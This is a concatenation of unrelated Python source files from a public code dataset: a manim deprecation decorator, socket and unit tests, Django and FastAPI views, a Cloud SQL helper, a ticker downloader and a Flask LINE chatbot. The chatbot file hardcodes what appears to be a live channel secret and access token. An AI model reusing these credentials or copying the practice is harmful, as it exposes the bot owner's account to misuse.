parameter to redirect to,\n          when attempting to use the first string.\n\n        * A function performing the mapping operation. The parameter names of the\n          function determine which parameters are used as input. The function must\n          return a dictionary which contains the redirected arguments.\n\n        Redirected parameters are also implicitly deprecated.\n\n    Returns\n    -------\n    Callable\n        The decorated callable.\n\n    Raises\n    ------\n    ValueError\n        If no parameters are defined (neither explicitly nor implicitly).\n    ValueError\n        If defined parameters are invalid python identifiers.\n\n    Examples\n    --------\n    Basic usage::\n\n        from manim.utils.deprecation import deprecated_params\n\n        @deprecated_params(params=\"a, b, c\")\n        def foo(**kwargs):\n            pass\n\n        foo(x=2, y=3, z=4)\n        # No warning\n\n        foo(a=2, b=3, z=4)\n        # WARNING The parameters a and b of method foo have been deprecated and may be removed in a later version.\n\n    You can also specify additional information for a more precise warning::\n\n        from manim.utils.deprecation import deprecated_params\n\n        @deprecated_params(\n            params=\"a, b, c\",\n            since=\"v0.2\",\n            until=\"v0.4\",\n            message=\"The letters x, y, z are cooler.\"\n        )\n        def foo(**kwargs):\n            pass\n\n        foo(a=2)\n        # WARNING The parameter a of method foo has been deprecated since v0.2 and is expected to be removed after v0.4. 
The letters x, y, z are cooler.\n\n Basic parameter redirection::\n\n from manim.utils.deprecation import deprecated_params\n\n @deprecated_params(redirections=[\n # Two ways to redirect one parameter to another:\n (\"old_param\", \"new_param\"),\n lambda old_param2: {\"new_param22\": old_param2}\n ])\n def foo(**kwargs):\n return kwargs\n\n foo(x=1, old_param=2)\n # WARNING The parameter old_param of method foo has been deprecated and may be removed in a later version.\n # returns {\"x\": 1, \"new_param\": 2}\n\n Redirecting using a calculated value::\n\n from manim.utils.deprecation import deprecated_params\n\n @deprecated_params(redirections=[\n lambda runtime_in_ms: {\"run_time\": runtime_in_ms / 1000}\n ])\n def foo(**kwargs):\n return kwargs\n\n foo(runtime_in_ms=500)\n # WARNING The parameter runtime_in_ms of method foo has been deprecated and may be removed in a later version.\n # returns {\"run_time\": 0.5}\n\n Redirecting multiple parameter values to one::\n\n from manim.utils.deprecation import deprecated_params\n\n @deprecated_params(redirections=[\n lambda buff_x=1, buff_y=1: {\"buff\": (buff_x, buff_y)}\n ])\n def foo(**kwargs):\n return kwargs\n\n foo(buff_x=2)\n # WARNING The parameter buff_x of method foo has been deprecated and may be removed in a later version.\n # returns {\"buff\": (2, 1)}\n\n Redirect one parameter to multiple::\n\n from manim.utils.deprecation import deprecated_params\n\n @deprecated_params(redirections=[\n lambda buff=1: {\"buff_x\": buff[0], \"buff_y\": buff[1]} if isinstance(buff, tuple)\n else {\"buff_x\": buff, \"buff_y\": buff}\n ])\n def foo(**kwargs):\n return kwargs\n\n foo(buff=0)\n # WARNING The parameter buff of method foo has been deprecated and may be removed in a later version.\n # returns {\"buff_x\": 0, buff_y: 0}\n\n foo(buff=(1,2))\n # WARNING The parameter buff of method foo has been deprecated and may be removed in a later version.\n # returns {\"buff_x\": 1, buff_y: 2}\n\n\n \"\"\"\n # Check if decorator is used without parenthesis\n if callable(params):\n raise ValueError(\"deprecate_parameters requires arguments to be specified.\")\n\n if params is None:\n params = []\n\n # Construct params list\n params = re.split(r\"[,\\s]+\", params) if isinstance(params, str) else list(params)\n\n # Add params which are only implicitly given via redirections\n if redirections is None:\n redirections = []\n for redirector in redirections:\n if isinstance(redirector, tuple):\n params.append(redirector[0])\n else:\n params.extend(list(inspect.signature(redirector).parameters))\n # Keep ordering of params so that warning message is consistently the same\n # This will also help pass unit testing\n params = list(dict.fromkeys(params))\n\n # Make sure params only contains valid identifiers\n identifier = re.compile(r\"^[^\\d\\W]\\w*\\Z\", re.UNICODE)\n if not all(re.match(identifier, param) for param in params):\n raise ValueError(\"Given parameter values are invalid.\")\n\n redirections = list(redirections)\n\n def warning_msg(func: Callable, used: list[str]):\n \"\"\"Generate the deprecation warning message.\n\n Parameters\n ----------\n func\n The callable with deprecated parameters.\n used\n The list of deprecated parameters used in a call.\n\n Returns\n -------\n str\n The deprecation message.\n \"\"\"\n what, name = _get_callable_info(func)\n plural = len(used) > 1\n parameter_s = \"s\" if plural else \"\"\n used_ = \", \".join(used[:-1]) + \" and \" + used[-1] if plural else used[0]\n has_have_been = \"have been\" if plural else \"has 
been\"\n deprecated = _deprecation_text_component(since, until, message)\n return f\"The parameter{parameter_s} {used_} of {what} {name} {has_have_been} {deprecated}\"\n\n def redirect_params(kwargs: dict, used: list[str]):\n \"\"\"Adjust the keyword arguments as defined by the redirections.\n\n Parameters\n ----------\n kwargs\n The keyword argument dictionary to be updated.\n used\n The list of deprecated parameters used in a call.\n \"\"\"\n for redirector in redirections:\n if isinstance(redirector, tuple):\n old_param, new_param = redirector\n if old_param in used:\n kwargs[new_param] = kwargs.pop(old_param)\n else:\n redirector_params = list(inspect.signature(redirector).parameters)\n redirector_args = {}\n for redirector_param in redirector_params:\n if redirector_param in used:\n redirector_args[redirector_param] = kwargs.pop(redirector_param)\n if len(redirector_args) > 0:\n kwargs.update(redirector(**redirector_args))\n\n def deprecate_params(func, *args, **kwargs):\n \"\"\"The actual decorator function used to extend the callables behavior.\n\n Logs a warning message when a deprecated parameter is used and redirects it if\n specified.\n\n Parameters\n ----------\n func\n The callable to decorate.\n args\n The arguments passed to the given callable.\n kwargs\n The keyword arguments passed to the given callable.\n\n Returns\n -------\n Any\n The return value of the given callable when being passed the given\n arguments.\n\n \"\"\"\n used = []\n for param in params:\n if param in kwargs:\n used.append(param)\n\n if len(used) > 0:\n logger.warning(warning_msg(func, used))\n redirect_params(kwargs, used)\n return func(*args, **kwargs)\n\n return decorator(deprecate_params)\n","repo_name":"ManimCommunity/manim","sub_path":"manim/utils/deprecation.py","file_name":"deprecation.py","file_ext":"py","file_size_in_byte":15062,"program_lang":"python","lang":"en","doc_type":"code","stars":16609,"dataset":"github-code","pt":"94"} +{"seq_id":"1505955909","text":"from select import *\nfrom socket import *\nfrom time import sleep\n\ntcp_sock = socket()\ntcp_sock.bind((\"0.0.0.0\", 8090))\ntcp_sock.listen()\n\nudp_sock = socket(AF_INET, SOCK_DGRAM)\nudp_sock.bind((\"0.0.0.0\", 8888))\n\nf = open(\"test.txt\")\n\np = poll() # poll对象\np.register(tcp_sock, POLLIN) # 关注IO\n\np.register(f, POLLIN)\nprint(tcp_sock.fileno(), POLLIN)\nsleep(2)\n\nprint(f.fileno(),POLLIN)\nevents = p.poll()\nprint(events)\n","repo_name":"seabedforest/study","sub_path":"month02/day16/poll_test.py","file_name":"poll_test.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"15124363354","text":"import unittest\nimport json\nfrom src.cms_visualizer.topography import (Topography, RectangularSource, RectangularTarget, RectangularObstacle,\n InvalidTopographyObjectException, DuplicateTopographyObjectIdException, TopographyReconstructionException,\n UndefinedTopographyObjectType)\n\n\nclass TopographyTest(unittest.TestCase):\n\n def test_topography_creation(self):\n topography = (\n Topography(width=200, height=200)\n .with_sources([RectangularSource(1, 5, 5, 1, 1)])\n .with_targets([RectangularTarget(2, 95, 95, 1, 1)])\n .with_obstacles([RectangularObstacle(3, 50, 50, 1, 1)])\n )\n self.assertIsInstance(topography, Topography)\n self.assertEqual(topography.width, 200)\n self.assertEqual(topography.height, 200)\n self.assertEqual(len(topography.sources), 1)\n self.assertEqual(len(topography.targets), 1)\n 
self.assertEqual(len(topography.obstacles), 1)\n\n def test_invalid_rect_source(self):\n with self.assertRaises(InvalidTopographyObjectException):\n Topography(width=100, height=100).with_sources(\n [RectangularSource(1, 105, 105, 1, 1)])\n\n def test_invalid_rect_target(self):\n with self.assertRaises(InvalidTopographyObjectException):\n Topography(width=100, height=100).with_targets(\n [RectangularTarget(1, -21, -21, 1, 1)])\n\n def test_invalid_rect_obstacle(self):\n with self.assertRaises(InvalidTopographyObjectException):\n Topography(width=100, height=100).with_obstacles(\n [RectangularObstacle(1, 5, 5, 0, 1)])\n\n def test_duplicate_id(self):\n with self.assertRaises(DuplicateTopographyObjectIdException):\n Topography(width=100, height=100).with_sources(\n [RectangularSource(1, 5, 5, 1, 1)]).with_targets(\n [RectangularTarget(1, 25, 25, 1, 1)])\n\n with self.assertRaises(DuplicateTopographyObjectIdException):\n Topography(width=100, height=100).with_targets(\n [RectangularTarget(1, 5, 5, 1, 1)]).with_sources(\n [RectangularSource(1, 25, 25, 1, 1)])\n\n with self.assertRaises(DuplicateTopographyObjectIdException):\n Topography(width=100, height=100).with_sources(\n [RectangularSource(1, 5, 5, 1, 1)]).with_obstacles(\n [RectangularObstacle(1, 25, 25, 1, 1)])\n\n def test_topography_creation_from_dict(self):\n with open('tests/valid_simulation.json') as f:\n simulation = json.load(f)\n\n topography = Topography.from_dict(simulation['topography'])\n self.assertIsInstance(topography, Topography)\n self.assertEqual(topography.width, 200)\n self.assertEqual(topography.height, 100)\n self.assertEqual(len(topography.sources), 1)\n self.assertEqual(len(topography.targets), 1)\n self.assertEqual(len(topography.obstacles), 2)\n\n def test_topography_creation_from_dict_missing_width_height(self):\n with self.assertRaises(TopographyReconstructionException):\n Topography.from_dict({\n 'sources': [],\n 'targets': [],\n 'obstacles': []\n })\n\n def test_topography_creation_from_dict_missing_objects(self):\n with self.assertRaises(TopographyReconstructionException):\n Topography.from_dict({\n 'targets': [],\n 'obstacles': []\n })\n with self.assertRaises(TopographyReconstructionException):\n Topography.from_dict({\n 'sources': [],\n 'obstacles': []\n })\n with self.assertRaises(TopographyReconstructionException):\n Topography.from_dict({\n 'targets': [],\n 'sources': []\n })\n\n def test_topography_creation_from_dict_unknown_type(self):\n with self.assertRaises(UndefinedTopographyObjectType):\n Topography.from_dict({\n \"targets\": [\n {\n \"id\": 1,\n \"x\": 5,\n \"y\": 5,\n \"radius\": 25,\n \"type\": \"CIRCLE\"\n }\n ],\n \"sources\": [],\n \"obstacles\": [],\n \"width\": 100,\n \"height\": 100\n })\n\n def test_topography_to_dict(self):\n topography = (\n Topography(width=200, height=200)\n .with_sources([RectangularSource(1, 5, 5, 1, 1)])\n .with_targets([RectangularTarget(2, 95, 95, 1, 1)])\n .with_obstacles([RectangularObstacle(3, 50, 50, 1, 1)])\n )\n topography_dict = topography.to_dict()\n self.assertEqual(topography_dict['width'], 200)\n self.assertEqual(topography_dict['sources'][0]['type'], 'RECTANGULAR')\n","repo_name":"gjke/cms-visualizer","sub_path":"tests/test_topography.py","file_name":"test_topography.py","file_ext":"py","file_size_in_byte":4985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"17910727223","text":"#!/usr/bin/python\n\nimport sys\nimport math\nimport json\nimport os\nimport traceback\n\n#environment 
specific\nclose_fds=False\n\nbase_path=os.path.abspath(os.path.join(os.path.abspath(os.path.dirname(__file__)), '..'))\ndata_path=base_path+\"/data\"\nsystem_data_path=data_path+\"/system\"\nsamples_path=data_path+\"/samples\"\nupload_path=data_path+\"/uploaded\"\nthumbnail_image_path=upload_path+\"/thumbnail\"\nmetadata_path=data_path+\"/metadata\"\nmfcc_path=metadata_path+\"/mfcc\"\ntags_path=metadata_path+\"/tags\"\ncodebook_path=data_path+\"/codebooks/current\"\ntag_to_generate_codebook=True\n\nversion_path=\"v0.2\"\n#\nSYSTEM_USER_ID=\"0\"\nMAX_DATA_SIZE=256\nSIZE_CODEBOOK=128\n\n#dynamic VQ\ndvq_scheme_n=3\ndvq_scheme_a=[1/3,1/3] #the last one is inferred\n\npy_executable=sys.executable\nffmpeg=\"/usr/bin/ffmpeg\"\nthumbnail_image_type=\".jpeg\"\n\ntry:\n\turl = os.environ[\"REQUEST_URI\"] \n\tserver_addr=os.environ[\"SERVER_ADDR\"]\n\tserver_port=os.environ[\"SERVER_PORT\"]\n\tdownload_baseUrl=\"http://\"+server_addr+\":\"+server_port+\"/\"+version_path+\"/data/uploaded\"\nexcept:\n\tdownload_baseUrl=None\n\ttraceback.print_exc(file=sys.stderr)\n","repo_name":"liesheng/dog-emotion-detector","sub_path":"application/web/cgi-bin/app_config.py","file_name":"app_config.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"14073272755","text":"# encoding: utf-8\n\nimport os\n\n\n##########################################\n# Init db connection.\n##########################################\n\n\nconn = None\n\n\n# Remove the comment notations. Make a connenction to real db. [TODO_DB]\n\n\"\"\"\nimport psycopg2\nimport urllib.parse as urlparse\n\nurlparse.uses_netloc.append(\"postgres\")\nurl = urlparse.urlparse(os.environ[\"DATABASE_URL\"])\n\nconn = psycopg2.connect(\n database=url.path[1:],\n user=url.username,\n password=url.password,\n host=url.hostname,\n port=url.port\n)\n\"\"\"\n\n\n##########################################\n# Init bot.\n##########################################\n\nfrom DataManager import DataManager\ndata_manager = DataManager(conn)\n\nfrom CianCianBot import CianCianBot\nbot = CianCianBot(data_manager)\n\n\n##########################################\n# Init flask backend and linebot facility.\n##########################################\n\nfrom flask import Flask, request, abort\n\nfrom linebot import (\n LineBotApi, WebhookHandler\n)\nfrom linebot.exceptions import (\n InvalidSignatureError\n)\nfrom linebot.models import (\n MessageEvent, TextMessage, TextSendMessage,\n)\n\napp = Flask(__name__)\n\nchannel_secret = 'd07d23b1fb9c10f9e2d638bf56856344'\nchannel_access_token = '6buiIgstKTe+PYLqN/jmy8MNjsn4qBSFr1IwYRLgb5x9BWtD6qPHLi/KVMCGB00ZbcSAJfjOByFezjQSL4IvdCb6wT12BwdbrZ+/zhDRthAsW967CMnh4W9zmntX2oYybmPjx4pk50e4dhnaTVUHHwdB04t89/1O/w1cDnyilFU='\nhandler = WebhookHandler(channel_secret)\nline_bot_api = LineBotApi(channel_access_token)\n\n\n@app.route('/')\ndef index():\n return \"
Hello World!
\"\n\n@app.route(\"/callback\", methods=['POST'])\ndef callback():\n # get X-Line-Signature header value\n signature = request.headers['X-Line-Signature']\n\n # get request body as text\n body = request.get_data(as_text=True)\n app.logger.info(\"Request body: \" + body)\n\n # handle webhook body\n try:\n handler.handle(body, signature)\n except InvalidSignatureError:\n abort(400)\n\n return 'OK'\n\n@handler.add(MessageEvent, message=TextMessage) # default\ndef handle_text_message(event): # default\n # User's message\n msg = event.message.text # message from user\n\n # User's chatting window id, could be `user_id`, `room_id`, `group_id`.\n if event.source.type == \"user\":\n src_id = event.source.user_id\n elif event.source.type == \"room\":\n src_id = event.source.room_id\n elif event.source.type == \"group\":\n src_id = event.source.group_id\n else:\n src_id = \"error\"\n unique_id = str(event.source.type) + \"_\" + src_id\n\n # Responding algorithm\n bot_response = bot.respond(msg, unique_id)\n\n # Reply\n line_bot_api.reply_message(\n event.reply_token,\n TextSendMessage(text=bot_response)\n )\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0',port=os.environ['PORT'])\n","repo_name":"AliciaTsai/LineBot","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2834,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"72663172468","text":"import os\nimport pymysql\nfrom flask import jsonify\n\ndb_user = os.environ.get('CLOUD_SQL_USERNAME')\ndb_password = os.environ.get('CLOUD_SQL_PASSWORD')\ndb_name = os.environ.get('CLOUD_SQL_DATABASE_NAME')\ndb_connection_name = os.environ.get('CLOUD_SQL_CONNECTION_NAME')\n\n\ndef open_connection():\n unix_socket = '/cloudsql/{}'.format(db_connection_name)\n try:\n if os.environ.get('GAE_ENV') == 'standard':\n conn = pymysql.connect(user=db_user, password=db_password,\n unix_socket=unix_socket, db=db_name,\n cursorclass=pymysql.cursors.DictCursor\n )\n except pymysql.MySQLError as e:\n print(e)\n\n return conn\n\n# Read all projects in DB front-end index it\ndef get_projects():\n conn = open_connection()\n with conn.cursor() as cursor:\n result = cursor.execute('SELECT * FROM PROJECTS;')\n projects = cursor.fetchall()\n if result > 0:\n got_projects = jsonify(projects)\n else:\n got_projects = 'No projects found in Database'\n conn.close()\n return got_projects\n\n\n# Create Survey Project\ndef add_projects(project):\n conn = open_connection()\n with conn.cursor() as cursor:\n cursor.execute('INSERT INTO PROJECTS (name, description, formData) VALUES(%s, %s, %s)', (project[\"name\"], project[\"description\"], project[\"formData\"]))\n conn.commit()\n conn.close()\n \n # Get User response by Selected ProjectID \ndef get_responses():\n conn = open_connection()\n with conn.cursor() as cursor:\n result = cursor.execute('SELECT * FROM USER_RESPONSES;')\n responses = cursor.fetchall()\n if result > 0:\n got_responses = jsonify(responses)\n else:\n got_responses = 'No user responses on database'\n conn.close()\n return got_responses\n\n\n# def get_responsesByProjectID():\n# conn = open_connection()\n# with conn.cursor() as cursor:\n# result = cursor.execute('SELECT USER_RESPONSES.responseData, USER_RESPONSES.ProjectID, PROJECTS.projectID FROM USER_RESPONSES INNER JOIN PROJECTS ON USER_RESPONSES.ProjectID=PROJECTS.projectID;')\n# responsesByID = cursor.fetchall()\n# if result > 0:\n# got_responses = jsonify(responsesByID)\n# else:\n# got_responses = 'No projects found in 
Database'\n# conn.close()\n# return got_responses\n\n\n# Submit response\ndef submit_response(response):\n conn = open_connection()\n with conn.cursor() as cursor:\n cursor.execute('INSERT INTO USER_RESPONSES (responseID, responseData, projectID) VALUES(%s, %s, %s)', (response[\"responseID\"],response[\"responseData\"], response[\"projectID\"]))\n conn.commit()\n conn.close()\n ","repo_name":"carolher/ChainedSurveyApp","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":2762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"24611455356","text":"from django.core.exceptions import ValidationError\nfrom django.utils.translation import ugettext_lazy as _\n\n\ndef validate_positive(value):\n if value < 0:\n raise ValidationError(\n _('%(value)s must be positive'),\n params={'value': value},\n )\n\n\ndef is_percent(value):\n if value < 0 and value > 100:\n raise ValidationError(\n _('%(value)s must be an integer between 0 and 100'),\n params={'value': value},\n )\n","repo_name":"Ircam-WAM/mezzanine-organization","sub_path":"organization/network/validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"94"} +{"seq_id":"73813405749","text":"import csv\nimport os\nimport pandas as pd\nfrom yahoo_fin.stock_info import *\nfrom definitions import TICKERS_DIR\n\n\n\ndef download_ticker():\n file_date = datetime.datetime.utcnow()\n file_date = file_date.strftime(\"%Y%m%d\")\n\n file_name = 'all_tickers.csv'\n if os.path.exists(TICKERS_DIR + file_date + '_' + file_name):\n df_tickers = pd.read_csv(TICKERS_DIR + file_date + '_' + file_name)\n # print(df_tickers.columns)\n return df_tickers\n\n else:\n # download sp500 tickers\n sp500_tickers = tickers_sp500()\n file_sp500 = 'sp500_tickers.csv'\n if os.path.exists(TICKERS_DIR + file_date + '_' + file_sp500):\n df_sp500 = pd.read_csv(TICKERS_DIR + file_date + '_' + file_sp500)\n else:\n with open(TICKERS_DIR + file_date + '_' + file_sp500, mode='w') as ticker_file:\n ticker_writer = csv.writer(ticker_file, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n ticker_writer.writerow(sp500_tickers)\n df_sp500 = pd.DataFrame()\n df_sp500['ticker'] = sp500_tickers\n df_sp500['sp500'] = True\n\n # # download dow\n # dow_tickers = tickers_dow()\n # file_dow = 'dow_tickers.csv'\n # if os.path.exists(TICKERS_DIR + file_date + '_' + file_dow):\n # df_dow = pd.read_csv(TICKERS_DIR + file_date + '_' + file_dow)\n # else:\n # with open(TICKERS_DIR + file_date + '_' + file_dow, mode='w') as ticker_file:\n # ticker_writer = csv.writer(ticker_file, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n # ticker_writer.writerow(dow_tickers)\n # df_dow = pd.DataFrame()\n # df_dow['ticker'] = dow_tickers\n # df_dow['dow'] = True\n\n # download nasdaq\n nasdaq_tickers = tickers_nasdaq()\n file_nasdaq = 'nasdaq_tickers.csv'\n if os.path.exists(TICKERS_DIR + file_date + '_' + file_nasdaq):\n df_nasdaq = pd.read_csv(TICKERS_DIR + file_date + '_' + file_nasdaq)\n else:\n with open(TICKERS_DIR + file_date + '_' + file_nasdaq, mode='w') as ticker_file:\n ticker_writer = csv.writer(ticker_file, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n ticker_writer.writerow(nasdaq_tickers)\n df_nasdaq = pd.DataFrame()\n df_nasdaq['ticker'] = nasdaq_tickers\n\n # download others\n other_tickers = tickers_other()\n file_other = 'other_tickers.csv'\n if 
os.path.exists(TICKERS_DIR + file_date + '_' + file_other):\n df_other = pd.read_csv(TICKERS_DIR + file_date + '_' + file_other)\n else:\n with open(TICKERS_DIR + file_date + '_' + file_other, mode='w') as ticker_file:\n ticker_writer = csv.writer(ticker_file, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n ticker_writer.writerow(other_tickers)\n df_other = pd.DataFrame()\n df_other['ticker'] = other_tickers\n\n # tickers all\n # tickers = list(set().union(sp500_tickers, dow_tickers, nasdaq_tickers, other_tickers))\n tickers = list(set().union(sp500_tickers, nasdaq_tickers, other_tickers))\n\n df_tickers = pd.DataFrame()\n df_tickers['ticker'] = tickers\n # df_tickers['dow'] = df_tickers['ticker'].apply(lambda x: True if x in dow_tickers else False)\n df_tickers['sp500'] = df_tickers['ticker'].apply(lambda x: True if x in sp500_tickers else False)\n df_tickers['exchange'] = df_tickers['ticker'].apply(lambda x: 'nasdaq' if x in nasdaq_tickers else None)\n df_tickers = df_tickers.loc[df_tickers['ticker'].str.len() > 0]\n\n # write to csv\n file_name = 'all_tickers.csv'\n df_tickers.to_csv(TICKERS_DIR + file_date + '_' + file_name, index=False)\n\n # check\n print('number of total stocks: {}'.format(len(df_tickers['ticker'])))\n print('number of unique stocks: {}'.format(df_tickers['ticker'].nunique()))\n # print('number of stocks in DOW: {}'.format(len(df_tickers.loc[df_tickers['dow'] == True])))\n print('number of stocks in SP500: {}'.format(len(df_tickers.loc[df_tickers['sp500'] == True])))\n print('number of stocks in NASDAQ: {}'.format(len(df_tickers.loc[df_tickers['exchange'] == 'nasdaq'])))\n\n return df_tickers\n\nif __name__ == '__main__':\n download_ticker()\n","repo_name":"dark7wind/stock_fundamental_valuation","sub_path":"src/data/download_ticker.py","file_name":"download_ticker.py","file_ext":"py","file_size_in_byte":4416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"72572654708","text":"from django.contrib.auth import get_user_model\nfrom django.http import JsonResponse\nfrom django.db.utils import IntegrityError\n\nfrom rest_framework import viewsets\nfrom rest_framework import permissions\nfrom rest_framework.decorators import action\nfrom rest_framework.response import Response\nfrom rest_framework.parsers import FileUploadParser, MultiPartParser\n\nUser = get_user_model()\n\nfrom apps.utils import hash_file\nfrom apps.api.permissions import UserIDPermission, WhiteListPermission\nfrom apps.api.serializers import AudioDocSerializer, DocSerializer\n\nfrom apps.docs.models import TextDocument\nfrom apps.docs.tasks import processa_textdoc_task\n\nfrom apps.audios.models import AudioDocument\nfrom apps.audios.tasks import processa_audiodoc_task\n\n\ndef root(request):\n return JsonResponse({\"projeto\": 'Sophia' })\n\nclass DocViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows groups to be viewed or edited.\n \"\"\"\n queryset = TextDocument.objects.all()\n serializer_class = DocSerializer\n permission_classes = [\n permissions.IsAuthenticated\n & WhiteListPermission\n & UserIDPermission\n ]\n # parser_classes = [FileUploadParser]\n parser_classes = [MultiPartParser]\n\n @action(detail=True, methods=['get'])\n def status(self, request, *args, **kwargs):\n doc = self.get_object()\n\n return Response({\n 'processando': doc.processando,\n 'processado': doc.foi_processado,\n })\n\n def create(self, request):\n data = dict(request.data)\n\n if 'files' not in data:\n return Response({\n 
'status': False,\n 'msg': 'Nenhum documento anexado encontrado'\n })\n\n resultado = []\n anexos = data['files']\n for anexo in anexos:\n\n if not anexo.content_type.startswith('audio') \\\n and not anexo.content_type.startswith('video'):\n\n api_userid = request.META.get('HTTP_X_API_USERID', None)\n hash_sha256 = hash_file(anexo)\n\n try:\n textdoc = TextDocument.objects.create(user=request.user, api_user=api_userid, hashfile=hash_sha256, file=anexo)\n\n textdoc.nome = anexo.name\n textdoc.size = anexo.size\n textdoc.filename = anexo.name\n textdoc.mime = anexo.content_type\n textdoc.ext = textdoc.file.name.split('.')[-1]\n # textdoc.save()\n\n resultado.append({\n 'filename': anexo.name,\n 'msg': 'Documento criado com sucesso'\n })\n except IntegrityError:\n resultado.append({\n 'filename': anexo.name,\n 'msg': 'Documento já existente para o usuário'\n })\n else:\n resultado.append({\n 'filename': anexo.name,\n 'msg': 'Rota não funciona para audios ou videos, favor consultar rota /audios'\n })\n\n return Response({\n 'status': True,\n 'msg': 'Consulta processada com sucesso',\n 'data': resultado\n })\n\n\n @action(detail=True, methods=['post'])\n def processa(self, request, *args, **kwargs):\n\n docid = kwargs['pk']\n textdoc = TextDocument.objects.filter(user__id=request.user.id, id=docid).first()\n\n if textdoc is None:\n return Response({ 'status': False, 'msg': 'Doc não encontrado' })\n\n if textdoc.foi_processado:\n return Response({ 'status': False, 'msg': 'Doc já processado', 'data': textdoc.id })\n\n if textdoc.processando:\n return Response({ 'status': False, 'msg': 'Doc está sendo processado', 'data': textdoc.id })\n\n textdoc.processando = True\n textdoc.save()\n\n processa_task = processa_textdoc_task.delay(userid=request.user.id, docid=docid)\n\n return Response({\n 'status': True,\n 'msg': 'Doc está sendo processado'\n\n })\n\nclass AudioDocViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows groups to be viewed or edited.\n \"\"\"\n queryset = AudioDocument.objects.all()\n serializer_class = AudioDocSerializer\n permission_classes = [\n permissions.IsAuthenticated\n & WhiteListPermission\n & UserIDPermission\n ]\n parser_classes = [FileUploadParser]\n\n @action(detail=True, methods=['get'])\n def status(self, request, *args, **kwargs):\n doc = self.get_object()\n\n return Response({\n 'processando': doc.processando,\n 'processado': doc.foi_processado,\n })\n\n def create(self, request):\n\n if 'file' not in request.data:\n return Response({\n 'status': False,\n 'msg': 'Documento anexado não encontrado'\n })\n\n if not request.data['file'].content_type.startswith('audio') and \\\n not request.data['file'].content_type.startswith('video'):\n return Response({\n 'status': False,\n 'msg': 'Rota funciona apenas para audios ou videos, favor consultar outra rota.'\n })\n\n api_userid = request.META.get('HTTP_X_API_USERID', None)\n hash_sha256 = hash_file(request.data['file'])\n\n try:\n audiodoc = AudioDocument.objects.create(user=request.user, api_user=api_userid, hashfile=hash_sha256, file=request.data['file'])\n except IntegrityError:\n return Response({\n 'status': False,\n 'msg': 'Audio já existente para o usuário'\n })\n\n audiodoc.nome = request.data['file'].name\n audiodoc.size = audiodoc.file.size\n audiodoc.filename = request.data['file'].name\n audiodoc.mime = request.FILES['file'].content_type\n audiodoc.ext = audiodoc.file.name.split('.')[-1]\n audiodoc.save()\n\n return Response({\n 'status': True,\n 'msg': 'Audio criado com sucesso',\n 'data': 
audiodoc.id,\n })\n\n @action(detail=True, methods=['post'])\n def processa(self, request, *args, **kwargs):\n\n docid = kwargs['pk']\n audiodoc = AudioDocument.objects.filter(user__id=request.user.id, id=docid).first()\n\n if audiodoc is None:\n return Response({ 'status': False, 'msg': 'Audio não encontrado' })\n\n if audiodoc.foi_processado:\n return Response({ 'status': False, 'msg': 'Audio já processado', 'data': audiodoc.id })\n\n if audiodoc.processando:\n return Response({ 'status': False, 'msg': 'Audio está sendo processado', 'data': audiodoc.id })\n\n audiodoc.processando = True\n audiodoc.save()\n\n processa_task = processa_audiodoc_task.delay(userid=request.user.id, docid=docid)\n\n return Response({\n 'status': True,\n 'msg': 'Audio está sendo processado'\n })\n\n\n","repo_name":"acba/sophia","sub_path":"apps/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7074,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"9580975446","text":"from fastapi.testclient import TestClient\nfrom models import Product_model\nfrom fastapi.encoders import jsonable_encoder\n\nfrom main import app\n\nclient = TestClient(app)\n\nroutes = \"\"\"path full name\n-------------------------------- ---------------------------------------------------------------\n/customers/all/ routes.customer.Customer_resource.r_get_customers\n/customers/filtered/{product_id} routes.customer.Customer_resource.r_get_customers_with_product\n/docs fastapi.applications.FastAPI.setup..swagger_ui_html\n/docs/oauth2-redirect fastapi.applications.FastAPI.setup..swagger_ui_redirect\n/openapi.json fastapi.applications.FastAPI.setup..openapi\n/products/all/ routes.product.Product_resource.r_get_products\n/products/create/ routes.product.Product_resource.r_add_product\n/products/delete/{id} routes.product.Product_resource.r_delete_product\n/products/edit/ routes.product.Product_resource.r_patch_product\n/products/filtered/{customer_id} routes.product.Product_resource.r_get_products_with_customer\n/redoc fastapi.applications.FastAPI.setup..redoc_html\"\"\"\n\n\ndef test_get_customers():\n response = client.get(\"/customers/all/\")\n assert response.status_code == 200\n\n\ndef test_get_products():\n response = client.get(\"/products/all/\")\n assert response.status_code == 200\n\n\ndef test_get_filtered_clients():\n response = client.get(\"/customers/filtered/1\")\n assert response.status_code == 200\n\n\ndef test_get_filtered_products():\n response = client.get(\"/products/filtered/1\")\n assert response.status_code == 200\n\n\ndef test_create_delete():\n '''post and delete'''\n response = client.get(\"/products/all\")\n start = response.json()\n client.post(\"/products/create\", json={'name': 'testTestTest'})\n response = client.get(\"/products/all\")\n end = response.json()\n assert len(end) > len(start)\n target = [i['id'] for i in end if i['name'] == 'testTestTest']\n for t in target:\n client.delete(f\"/products/delete/{t}\")\n\n\ndef test_patch():\n '''create, patch, delete'''\n client.post(\"/products/create\",\n json={'name': 'testPatchtestPatchtestPatch'})\n start = client.get(\"/products/all\").json()\n target_ids = [i['id']\n for i in start if 